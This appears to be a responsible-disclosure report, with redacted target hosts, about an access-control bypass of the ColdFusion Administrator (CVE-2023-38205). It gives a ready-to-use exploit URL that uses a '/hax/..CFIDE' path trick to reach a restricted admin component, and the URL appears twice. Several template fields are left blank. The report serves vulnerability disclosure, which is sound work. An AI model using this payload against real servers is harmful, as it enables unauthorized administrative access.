Hello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at ██████
Steps to reproduce
- Please open the following link:
> https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
Proof of concept
Impact
Access Control Bypass.
Thanks and have a nice day!
System Host(s)
██████
Affected Product(s) and Version(s)
CVE Numbers
Steps to Reproduce
- Please open the following link:
> https://████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
Suggested Mitigation/Remediation Actions